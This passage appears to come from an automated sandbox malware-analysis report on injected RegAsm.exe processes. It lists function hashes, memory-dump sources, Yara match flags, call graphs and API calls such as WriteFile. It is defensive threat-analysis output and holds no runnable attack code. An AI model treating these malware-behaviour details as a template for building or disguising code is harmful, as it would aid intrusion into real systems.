                                  • Opcode Fuzzy Hash: 2b05515a8f63fdfb25d71061938399d645ead571ffbbefa476f5627f544fcce7
                                  • Instruction Fuzzy Hash: 0CF01971F001198FCB54EBB9D9445DEBBF9FFC8350FA00169C50AE7250EA355E018BA9
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC507C0, Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a92ee89d5fbed2446daa676405f82351f5526cf4e9eab24c97b7ffdada749249
                                  • Instruction ID: 272d55b6cd7b253583db6f3cce75dc63e805bbc2243f6114600ec3ed2a1d8d22
                                  • Opcode Fuzzy Hash: a92ee89d5fbed2446daa676405f82351f5526cf4e9eab24c97b7ffdada749249
                                  • Instruction Fuzzy Hash: 5B016975A00219CFCB60EFB8D881AAE7BB6FB59311F50462AC108AB246D7316946CB90
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC50A58, Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 45bc3c6ef7ba623742a96214ff3e2d85f2f829e07f04e9a5bfeb1e0d8844f131
                                  • Instruction ID: fd8070464a06fde73a7751ca488529014a97ae07aeab52c757acd7b0803f4dbe
                                  • Opcode Fuzzy Hash: 45bc3c6ef7ba623742a96214ff3e2d85f2f829e07f04e9a5bfeb1e0d8844f131
                                  • Instruction Fuzzy Hash: 64F04F72E102168FCB40DFBC98412ADBBF0FB582617214636D119E7290E7305916CB90
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1D860606, Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24280923432.000000001D860000.00000040.00000040.sdmp, Offset: 1D860000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d860000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 810d3667b8c962ac9465ef24873b9ee49101dd6408d1e2270bf8cf8c5e047415
                                  • Instruction ID: 62b14228030559f2d008f6740706ed343f6b90ce95342c28fe9aa71e55a0c7bb
                                  • Opcode Fuzzy Hash: 810d3667b8c962ac9465ef24873b9ee49101dd6408d1e2270bf8cf8c5e047415
                                  • Instruction Fuzzy Hash: 6FE092B66007048BD650CF0AEC81462FBD4EB84630B08C47FDC0D8B701D275B904CAE1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1D8AAD93, Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281186224.000000001D8AA000.00000040.00000001.sdmp, Offset: 1D8AA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d8aa000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d8cccb8d6f28e0f3f0cd7c7c81fb30db7b9da23a6bbaae455e7d378d54191bc
                                  • Instruction ID: a33eefe48fe9b9f13de3301b25094059ff745c113d9016d6365ecd104f4702cf
                                  • Opcode Fuzzy Hash: 0d8cccb8d6f28e0f3f0cd7c7c81fb30db7b9da23a6bbaae455e7d378d54191bc
                                  • Instruction Fuzzy Hash: 48E0D8B6640304A7D2108F069C82B73FB98DB50A30F04C557ED085B342D171B51489F1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 20261C37, Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24285068879.0000000020260000.00000040.00000001.sdmp, Offset: 20260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_20260000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b42eb7e8fb13425d645ed7862fbcf64e1c8f8997b5245e1b9f8d262cb77b232e
                                  • Instruction ID: 012957ef466bcf0cc9cc5a4c4e4a94cb86728d75fcefd1b3c7d55d42405cb57a
                                  • Opcode Fuzzy Hash: b42eb7e8fb13425d645ed7862fbcf64e1c8f8997b5245e1b9f8d262cb77b232e
                                  • Instruction Fuzzy Hash: CEE0D8B664030067D2108F069C82B63FB98DB90A30F04C46BED085B342D171B51489F1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 20261ABF, Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24285068879.0000000020260000.00000040.00000001.sdmp, Offset: 20260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_20260000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a63952b436ebff2c84b6d82d3222250b41e433d515f8080fd48bab914ad1bed
                                  • Instruction ID: 4b0121d09d08ae0dc2361c1b34e05d8800f55d363e15671f90d759dbdc2fb69f
                                  • Opcode Fuzzy Hash: 9a63952b436ebff2c84b6d82d3222250b41e433d515f8080fd48bab914ad1bed
                                  • Instruction Fuzzy Hash: 7EE0D8B664030467D2509F069C82B63FB98DB40A30F08C45BED0C5B342D172B51489F1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 202614E3, Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24285068879.0000000020260000.00000040.00000001.sdmp, Offset: 20260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_20260000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 224781268ce0ac69a42e78d92187a687177a5d7ef93da09b71087a17af09de8a
                                  • Instruction ID: 6121906df5a593de0f055d66a74962db305ce09e39cb69cb5cd15db7398c4eed
                                  • Opcode Fuzzy Hash: 224781268ce0ac69a42e78d92187a687177a5d7ef93da09b71087a17af09de8a
                                  • Instruction Fuzzy Hash: 50E0D8B664030067D210DF069C82B63FB98DB80A30F04C45BED085B342D172B514C9E1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC50480, Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bfa5041a7053a1361659c44f11a7945f897799de4ee0bc0301fb0c8392aeb613
                                  • Instruction ID: 5dc19ee4f5bf69d44c23ce622274b70b97b38ba21a7d36a4ed187e056e52d0be
                                  • Opcode Fuzzy Hash: bfa5041a7053a1361659c44f11a7945f897799de4ee0bc0301fb0c8392aeb613
                                  • Instruction Fuzzy Hash: BCD05E351582904FCB4287A8E8E14D43FF1D70B13430585C2E088CB663C629486EDB01
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1D8923F4, Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281007578.000000001D892000.00000040.00000001.sdmp, Offset: 1D892000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d892000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5eeeae1eafcf6a213b944843a6d419c36e2714780b5c6b0d922b586f990bb2fd
                                  • Instruction ID: b09f1cd50f7468c534ed209018a85162d929e545a3a0f90f68fd7e1745398484
                                  • Opcode Fuzzy Hash: 5eeeae1eafcf6a213b944843a6d419c36e2714780b5c6b0d922b586f990bb2fd
                                  • Instruction Fuzzy Hash: 10D05E797046818FD306DE18C1E1FA53B94BBA2B14F8644FAA8408B763C768D581D201
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1D8923BC, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281007578.000000001D892000.00000040.00000001.sdmp, Offset: 1D892000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d892000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a619bc74b573e07939a20703b5affa3cf2bfe0c5ce2154754b216f6a3071df9
                                  • Instruction ID: 21a7371b169ae65a5f5771aaf573f92cba8efbf1d18a66a7c413b1731a6ae8aa
                                  • Opcode Fuzzy Hash: 4a619bc74b573e07939a20703b5affa3cf2bfe0c5ce2154754b216f6a3071df9
                                  • Instruction Fuzzy Hash: 0BD05E356002814BDB05DE08C2D0F6937D8AB80B04F4244E8BC418F772C7B4D9C0D600
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FC51511, Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24282655579.000000001FC50000.00000040.00000001.sdmp, Offset: 1FC50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1fc50000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7b0935b2cd809d2355d823f910c416ab23e8a565fc341e3121ce4913e234c94
                                  • Instruction ID: b9572b71a987fc13251fcc2864e4b46cdaad1ec785ec42eb9c1296f402a867cc
                                  • Opcode Fuzzy Hash: b7b0935b2cd809d2355d823f910c416ab23e8a565fc341e3121ce4913e234c94
                                  • Instruction Fuzzy Hash: ADC01236B44458C7DF04FBF8F4940DCB374EAC422575108A1D525A3050DF311E548761
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Non-executed Functions

                                  Function 00C31E6C, Relevance: .3, Instructions: 327COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: aae17fba98d4bf99c1c74551a9e39b707c6f486f06c259c83d60bcf6ad55c139
                                  • Instruction ID: 1195abe207876bffed4e289598c4e5b6d1567c369a5d1ac1904c74ff3ed85aa0
                                  • Opcode Fuzzy Hash: aae17fba98d4bf99c1c74551a9e39b707c6f486f06c259c83d60bcf6ad55c139
                                  • Instruction Fuzzy Hash: 19B1DE71700712EFDB18EF28CC91BD6B3A4FF19764F594329ECA997281CB34A8558B90
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C38F5A, Relevance: .3, Instructions: 301COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6c04facf7fb2d7d8b1b38c1efeb0a0a7bc062ea3075f2b863e4a23f95b2be87
                                  • Instruction ID: 89bf63b71386a0c13ee9f097c18854f359dca22ee47d775ce8180aa88b367736
                                  • Opcode Fuzzy Hash: c6c04facf7fb2d7d8b1b38c1efeb0a0a7bc062ea3075f2b863e4a23f95b2be87
                                  • Instruction Fuzzy Hash: B8A189B176034A6FFB215E24CD86BDA3767FF16350F604228FE44AB1D1C7B999889740
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C3949D, Relevance: .2, Instructions: 227COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadMemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 3389902171-0
                                  • Opcode ID: 5c26341aa8f10338cf57669b83da95fb2960708d1176b5b9c74d93ace4facdde
                                  • Instruction ID: befdae7e1404a489b24c2dccc33b04b1ed18cc20f05700e452267ebb861cf1d6
                                  • Opcode Fuzzy Hash: 5c26341aa8f10338cf57669b83da95fb2960708d1176b5b9c74d93ace4facdde
                                  • Instruction Fuzzy Hash: 1C81B570A143429EDF25DF2888D4755BAD1EF22320F4883ADCDA68B2D6C3718986D722
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C38799, Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b0ad40354aa7490124a58e7620738842b7f8dd1229dc5e7a5102532bc5f98c4
                                  • Instruction ID: 3e72e0befc3fa6c035dc677bd5b4008645e4fbe1d3e57c9f9ab9bece2274e205
                                  • Opcode Fuzzy Hash: 6b0ad40354aa7490124a58e7620738842b7f8dd1229dc5e7a5102532bc5f98c4
                                  • Instruction Fuzzy Hash: FDE0ED7D3317008FC714DA28C5D4E5573A6AB5A750F254551F9118B661DA34EC44D620
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C34109, Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe73df34f80c548d7f38e4da902f382a4500c5c07af9d1c34425ce2ab83f480e
                                  • Instruction ID: d684541be87bc655fadfcc34e009f7789161328f5676fde78bb395d58ecedf95
                                  • Opcode Fuzzy Hash: fe73df34f80c548d7f38e4da902f382a4500c5c07af9d1c34425ce2ab83f480e
                                  • Instruction Fuzzy Hash: 63C04CB6650481CFEF59DA09C491B947361B765744BD944D0E046CBA55C318ED41C600
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C381B7, Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7a8975aa85ffa681981e648174b86ff935b29160b824c6080d71e9c0c58d4292
                                  • Instruction ID: b933d7a8f0b1c7a96fb1429829bcf9fa5e697247fe5bddf5ae2b1ed24a185623
                                  • Opcode Fuzzy Hash: 7a8975aa85ffa681981e648174b86ff935b29160b824c6080d71e9c0c58d4292
                                  • Instruction Fuzzy Hash: 03B092313106408FCA51CE19C1D0F80B3E0BF00A40B8244A4E00187A51C364E804C900
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C39E56, Relevance: .0, Instructions: 3COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1985188533ae361fcbfaf6301ae5d8934191e8d79537ea20f659d31287449d5
                                  • Instruction ID: b36b371992250da8c45f1cd1506764a1d816c012ef71655a4cc1844282d2f311
                                  • Opcode Fuzzy Hash: d1985188533ae361fcbfaf6301ae5d8934191e8d79537ea20f659d31287449d5
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Analysis Process: RegAsm.exe PID: 2652 Parent PID: 4560 RegAsm.exeCOMMON

                                  Execution Graph

                                  Execution Coverage:27.5%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:29
                                  Total number of Limit Nodes:2

                                  Graph

                                  execution_graph 780 8da38e 781 8da3f9 780->781 782 8da3ba FindCloseChangeNotification 780->782 781->782 783 8da3c8 782->783 784 8da4de 787 8da513 WriteFile 784->787 786 8da545 787->786 808 8da35a 809 8da38e FindCloseChangeNotification 808->809 811 8da3c8 809->811 812 8da4aa 813 8da4de WriteFile 812->813 815 8da545 813->815 788 c80070 789 c80087 788->789 791 c800b9 788->791 792 c800c5 791->792 793 c8011a 792->793 796 8da23c 792->796 800 8da25e 792->800 793->789 797 8da25e GetConsoleOutputCP 796->797 799 8da29c 797->799 799->793 801 8da287 GetConsoleOutputCP 800->801 802 8da2b0 800->802 803 8da29c 801->803 802->801 803->793 804 c80006 805 c80070 804->805 806 c80087 805->806 807 c800b9 2 API calls 805->807 807->806

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00C80CC8 38 Function_00C80D19 0->38 1 Function_008DA38E 2 Function_008D2005 3 Function_008DA005 4 Function_00C80AC1 4->0 5 Function_02410648 19 Function_0241066A 5->19 6 Function_008DA407 7 Function_024105CF 8 Function_008D2098 9 Function_02410054 10 Function_008DA09A 11 Function_008D2194 12 Function_008D2310 13 Function_008D2710 14 Function_008DA210 15 Function_008DA02E 16 Function_024105E4 17 Function_00C802EE 18 Function_008DA4AA 20 Function_0241026D 21 Function_008DA120 22 Function_008D23BC 23 Function_008D213C 24 Function_008DA23C 25 Function_02410074 26 Function_008DA43A 27 Function_00C80070 27->16 33 Function_02410606 27->33 51 Function_00C800B9 27->51 55 Function_008D23F4 27->55 60 Function_00C801B7 27->60 28 Function_008D22B4 29 Function_008D2430 30 Function_0241067F 31 Function_02410000 32 Function_008DA148 34 Function_008D2044 35 Function_008DA2C7 36 Function_0241000C 37 Function_00C80006 37->16 37->33 37->51 37->55 37->60 45 Function_00C80D90 38->45 48 Function_00C80DA0 38->48 39 Function_02410710 40 Function_008DA4DE 41 Function_008DA25E 42 Function_008D2458 43 Function_008DA35A 44 Function_00C80710 44->0 45->45 45->48 46 Function_008D20D0 47 Function_008DA2EE 48->45 48->48 49 Function_008D2364 50 Function_008D2264 51->24 51->41 52 Function_008D24FC 53 Function_00C80E3A 54 Function_008DA078 56 Function_008DA1F4 57 Function_008D21F0 58 Function_024105BF 59 Function_008DA172 60->0 60->4 60->16 60->33 60->44 60->60

                                  Executed Functions

                                  Function 00C801B7, Relevance: .6, Instructions: 572COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24199712110.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_c80000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 192049ef41716891ee5ec6ef21dfbf92bc100e8bbdfbae5b5c3a6e5ccd56ef4d
                                  • Instruction ID: f2cfa82b540222d47de8c5319bdae6a00531ee0fef71a6315d646c06085e4ba8
                                  • Opcode Fuzzy Hash: 192049ef41716891ee5ec6ef21dfbf92bc100e8bbdfbae5b5c3a6e5ccd56ef4d
                                  • Instruction Fuzzy Hash: A532AC30604245CFDB54EF29C884A6AB7F2FF88308F208968D8569B265EB31DD49CF64
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 008DA4AA, Relevance: 1.6, APIs: 1, Instructions: 79fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 8da4aa-8da535 4 8da579-8da57e 0->4 5 8da537-8da557 WriteFile 0->5 4->5 8 8da559-8da576 5->8 9 8da580-8da585 5->9 9->8
                                  APIs
                                  • WriteFile.KERNELBASE(?,00000E90,B567927A,00000000,00000000,00000000,00000000), ref: 008DA53D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 76401b1de76ac2389e8d047a23e3ecc27367a508254ec8f5d5227a9aff371911
                                  • Instruction ID: b03b03e27054210f25720645d3922d1e7a10c6f7beb36313182ea09b804c4723
                                  • Opcode Fuzzy Hash: 76401b1de76ac2389e8d047a23e3ecc27367a508254ec8f5d5227a9aff371911
                                  • Instruction Fuzzy Hash: CE2171714093806FDB228B619C84B96BFB8EF46310F1885DBE985DF163D265A509CB72
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 008DA35A, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 12 8da35a-8da3b8 14 8da3f9-8da3fe 12->14 15 8da3ba-8da3c2 FindCloseChangeNotification 12->15 14->15 16 8da3c8-8da3da 15->16 18 8da3dc-8da3f8 16->18 19 8da400-8da405 16->19 19->18
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 008DA3C0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 698a75f327fd903e98b75c438996f0037f31ea98c13e7d75477c60c6d9b97987
                                  • Instruction ID: 6ba2ac6043b71c1f9ec053252c0f8803814f368e72a9a38c0df4d5366d7b3b08
                                  • Opcode Fuzzy Hash: 698a75f327fd903e98b75c438996f0037f31ea98c13e7d75477c60c6d9b97987
                                  • Instruction Fuzzy Hash: 80216D715093C09FD7128B25DC95B52BFB4EF06220F0984EBED85CF263C269A949CB62
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Function 008DA4DE, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 21 8da4de-8da535 24 8da579-8da57e 21->24 25 8da537-8da53f WriteFile 21->25 24->25 26 8da545-8da557 25->26 28 8da559-8da576 26->28 29 8da580-8da585 26->29 29->28
                                  APIs
                                  • WriteFile.KERNELBASE(?,00000E90,B567927A,00000000,00000000,00000000,00000000), ref: 008DA53D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: f3f5e25429371fc571e3570dfff8fb4eaa57c29566559e97cdd2f715e627e1ee
                                  • Instruction ID: 0c3e9be645122e38dca27b522358776a243a60ca30bbd44c832dcfe64d845364
                                  • Opcode Fuzzy Hash: f3f5e25429371fc571e3570dfff8fb4eaa57c29566559e97cdd2f715e627e1ee
                                  • Instruction Fuzzy Hash: 19110172500204AFEB21DF91EC84BAAFBA8EF44320F14855AED49DB211C335A504CBB2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 008DA23C, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 32 8da23c-8da285 34 8da287-8da29a GetConsoleOutputCP 32->34 35 8da2b0-8da2b5 32->35 36 8da29c-8da2af 34->36 37 8da2b7-8da2bc 34->37 35->34 37->36
                                  APIs
                                  • GetConsoleOutputCP.KERNELBASE ref: 008DA28D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ConsoleOutput
                                  • String ID:
                                  • API String ID: 3985236979-0
                                  • Opcode ID: 99b0253377c7314c77779a3004a4fa8f443f56a7638fc1c2d04b028adba33d0c
                                  • Instruction ID: bc774bc77cbff9e3cb1245120ef3638e7fea04a49760e267450696479ad4b548
                                  • Opcode Fuzzy Hash: 99b0253377c7314c77779a3004a4fa8f443f56a7638fc1c2d04b028adba33d0c
                                  • Instruction Fuzzy Hash: 4801D2314093C49FCB118F15DC84B52FFA4EF06320F0980DAED898F262C269A908CB62
                                  Uniqueness

                                  Uniqueness Score: 2.84%

                                  Function 008DA38E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 40 8da38e-8da3b8 41 8da3f9-8da3fe 40->41 42 8da3ba-8da3c2 FindCloseChangeNotification 40->42 41->42 43 8da3c8-8da3da 42->43 45 8da3dc-8da3f8 43->45 46 8da400-8da405 43->46 46->45
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 008DA3C0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 89596cc91018a36ff54e4c5d7b32f6c647f98094f9c99c93412d40a63958f285
                                  • Instruction ID: 4ed4f051f969cfd5c54d87d0c75f60eee8e57dffdf541c5418676266b0d3b884
                                  • Opcode Fuzzy Hash: 89596cc91018a36ff54e4c5d7b32f6c647f98094f9c99c93412d40a63958f285
                                  • Instruction Fuzzy Hash: 3501F231A00384DFDB24CF29D889766FBA4EF40320F18C1ABDD09CB302D675E844CA62
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Function 008DA25E, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 48 8da25e-8da285 49 8da287-8da29a GetConsoleOutputCP 48->49 50 8da2b0-8da2b5 48->50 51 8da29c-8da2af 49->51 52 8da2b7-8da2bc 49->52 50->49 52->51
                                  APIs
                                  • GetConsoleOutputCP.KERNELBASE ref: 008DA28D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198696071.00000000008DA000.00000040.00000001.sdmp, Offset: 008DA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8da000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ConsoleOutput
                                  • String ID:
                                  • API String ID: 3985236979-0
                                  • Opcode ID: c872e890cf8a214a88ecda21b570eec1148987085d7e00dd9d8fcc207563ddec
                                  • Instruction ID: 6471203db0ba62b4645fcbdea604fdd5416cde13bfb377ddc9790a376863d3b2
                                  • Opcode Fuzzy Hash: c872e890cf8a214a88ecda21b570eec1148987085d7e00dd9d8fcc207563ddec
                                  • Instruction Fuzzy Hash: 23F0CD315047849FDB10CF46D888762FBA0EF44725F28C19ADE099F716D37AA948CAA2
                                  Uniqueness

                                  Uniqueness Score: 2.84%

                                  Function 00C80710, Relevance: .4, Instructions: 447COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
